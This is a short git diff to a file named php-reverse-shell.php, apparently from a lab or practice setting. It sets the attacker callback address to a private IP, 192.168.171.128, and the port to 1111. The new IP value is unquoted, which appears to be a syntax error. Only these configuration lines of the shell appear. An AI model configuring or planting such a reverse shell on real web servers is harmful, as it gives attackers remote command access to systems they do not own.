diff --git a/php-reverse-shell.php b/php-reverse-shell.php index 2503b71..0a85160 100755 --- a/php-reverse-shell.php +++ b/php-reverse-shell.php @@ -46,8 +46,8 @@ set_time_limit (0); $VERSION = "1.0"; -$ip = '127.0.0.1'; // CHANGE THIS -$port = 1234; // CHANGE THIS +$ip = 192.168.171.128; // CHANGE THIS +$port = 1111; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null;